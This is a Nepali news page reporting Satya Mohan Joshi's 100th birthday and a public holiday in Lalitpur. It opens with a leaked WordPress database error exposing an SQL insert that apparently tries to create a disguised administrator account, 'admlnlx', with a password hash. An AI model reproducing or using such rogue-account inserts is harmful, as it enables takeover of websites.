WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/whrcyQBBnbGY0Zr2eV/DuJNo2RDP1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 01:55:22', '', 'admlnlx', 'admlnlx')

सत्यमोहनको १०० वर्षको अवसरमा ललितपुर जिल्लामा सार्वजनिक विदा – Gaule Khabar

सत्यमोहनको १०० वर्षको अवसरमा ललितपुर जिल्लामा सार्वजनिक विदा

सत्यमोहनको १०० वर्षको अवसरमा ललितपुर जिल्लामा सार्वजनिक विदा

गाउँले न्यूज, ३० वैशाख, काठमाडौं । सँस्कृतिविद सत्यमोहन जोशी आजबाट एक सय वर्ष पुगे । दीर्घजीवी जोशीको ललितपुरस्थित निवासमा सोमबार बिहानैबाट विशेष चहलपहल थियो । राजनीतिक दलका नेतादेखि सर्वसाधारणसम्म उनलाई शुभकामना दिन र आशिर्वाद लिन उनको निवास पुगेका थिए ।
सुरुमा उनकी छोरीले रातो टीका लगाइदिइन् । माला र खादा लगाइदिएर सगुन खुवाइन् । त्यसपछि आफन्त र स्थानीय अन्य व्यक्तिहरुले पनि त्यसै गरे । उनीहरुले गीती लयमा जोशीको सुस्वास्थ्य र दीर्घायू कामना गरे ।

राष्ट्रपति विद्यादेवी भण्डारीले दिएको शुभकामना सन्देश हस्तान्तरणको संक्षिप्त कार्यक्रम गरियो । सन्देशमार्फत् राष्ट्रपति भण्डारीले मंगलकामनासहित जोशीको सुस्वास्थ्य र दीर्घायूको कामना गरेकी छन् ।

कार्यक्रममा श्रम तथा रोजगार मन्त्री गोकर्ण विष्ट, ललितपुर महानगरपालिकाका मेयर चिरीबाबु महर्जन, नेकपा नेता कृष्णगोपाल श्रेष्ठ लगायतको उपस्तिथी रहेको थियो ।

सँस्कृतिविद सत्यमोहन जोशीको जन्मोत्सवमा ललितपुर जिल्लामा सार्वजनिक विदा नै दिइएको छ । शताव्दी पुरुषको उपमा पाएका उनलाई ललितपुर उपमहानगरबासीले नगर परिक्रमासहित सोमबार सम्मानसमेत गर्दैछन् । एक वर्षसम्म बिभिन्न कार्यक्रम गरी उनको जन्म शताब्दी मनाउने कार्यक्रम पनि तय गरिएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका